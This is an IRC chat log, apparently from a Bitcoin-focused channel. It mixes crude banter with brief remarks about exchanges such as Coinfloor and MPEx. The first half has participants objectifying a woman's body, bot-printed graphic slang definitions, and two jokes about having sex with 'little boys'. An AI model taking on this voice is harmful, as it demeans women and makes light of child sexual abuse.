Oct 30 00:02:04 <dub> holy shit Oct 30 00:02:22 <dub> locate that and insert cock to prevent further noise eminance Oct 30 00:03:55 <mircea_popescu> emittance or eminence you mean ? Oct 30 00:04:12 <mircea_popescu> maybe you mean eminem-ce Oct 30 00:04:43 <mircea_popescu> but anyway, she's cute and sorta-moves, but no tits, no ass, wtf are we doing here, fucking little boys nao ? Oct 30 00:05:56 <pankkake> she likes to dress up Oct 30 00:06:31 <kakobrekla> why be so judgemental on the tits on ass or the lack of there of Oct 30 00:07:01 <kakobrekla> noone give a fuck if your penis is 'small' unless is anatomically too smal Oct 30 00:07:04 <kakobrekla> which if fuckin rare. Oct 30 00:07:14 <mircea_popescu> who said things are fair ? Oct 30 00:07:19 <mircea_popescu> i disctiminante by tits and ass! Oct 30 00:07:23 <kakobrekla> is* Oct 30 00:08:47 <dub> she's got gap Oct 30 00:09:05 <dub> but agree on the tit/ass deficiency Oct 30 00:09:15 <dub> ;;ud gap Oct 30 00:09:17 <gribble> http://www.urbandictionary.com/define.php?term=gap | The space between the thighs on a female body, just below the crotch. A gap is indicative of a slim figure and is very sexy. Oct 30 00:09:18 <ozbot> Urban Dictionary: gap Oct 30 00:09:30 <dub> wd ud Oct 30 00:10:14 <kakobrekla> well Oct 30 00:10:21 <kakobrekla> i guess ill stay with little boys then! Oct 30 00:10:34 <dub> moar ass for the rest of us Oct 30 00:11:29 <pankkake> gape > gap Oct 30 00:11:51 <kakobrekla> ;;ud gape Oct 30 00:11:52 <gribble> http://www.urbandictionary.com/define.php?term=gape | The stretched out asshole after being fucked in the ass. A result of dukeing it. Oct 30 00:11:53 <ozbot> Urban Dictionary: gape Oct 30 00:12:00 <kakobrekla> a that. Oct 30 00:13:10 <dub> pankkake's requirements include ease of spacedocking Oct 30 00:13:22 <dub> ;;ud spacedocking Oct 30 00:13:23 <gribble> http://www.urbandictionary.com/define.php?term=space%20docking | Brian squatted over her, lined it up, and began space docking. ... Like a space ship attempting to dock to a space station, "space docking" involves very accurate  ... Oct 30 00:13:24 <ozbot> Urban Dictionary: space docking Oct 30 00:13:24 <jcpham> i love to spacedock Oct 30 00:13:45 <pankkake> I'm learning things today Oct 30 00:13:51 <pankkake> wow, ew Oct 30 00:14:24 <kakobrekla> so that things was done. Oct 30 00:14:33 <mircea_popescu> a gap is only sexy on a woman with a nice big ass Oct 30 00:14:39 <mircea_popescu> because it shows she's not fat, just sexy. Oct 30 00:14:41 <kakobrekla> -s Oct 30 00:14:46 <mircea_popescu> on some skinny plank it's unsexy Oct 30 00:16:28 <kakobrekla> looking for that motherly venera features eh Oct 30 00:16:34 <kakobrekla> :) Oct 30 00:17:27 <kakobrekla> venus, its called. Oct 30 00:17:36 <kakobrekla> or something in between Oct 30 00:18:22 <kakobrekla> http://www.ezadar.hr/repository/image_raw/47276/large/ Oct 30 00:22:06 <assbot> [HAVELOCK] [NEOBEE] 298 @ 0.0026 = 0.7748 BTC [-] {2} Oct 30 00:54:06 <pigeons> so not only does zhoutong now run a successful excchange in australia now, but nefario works for something called "coinfloor" https://bitcointalk.org/index.php?topic=115669.msg3435103#msg3435103 Oct 30 00:55:20 <jurov> sooo...to place mpex order, you have to get through mutually distrustful network of proxies Oct 30 00:55:52 <jurov> oh, and to rectify power problems, i'd recommend optical power couplers instead of transformers. Oct 30 00:56:51 <kakobrekla> change the tie to red and you got a hitman Oct 30 01:01:09 <jurov> Apparently the coins in coinfloor will be handled in full accord to FDA regulations. Oct 30 01:01:18 <jurov> Proper hygiene ftw! Oct 30 01:01:43 <kakobrekla> which are none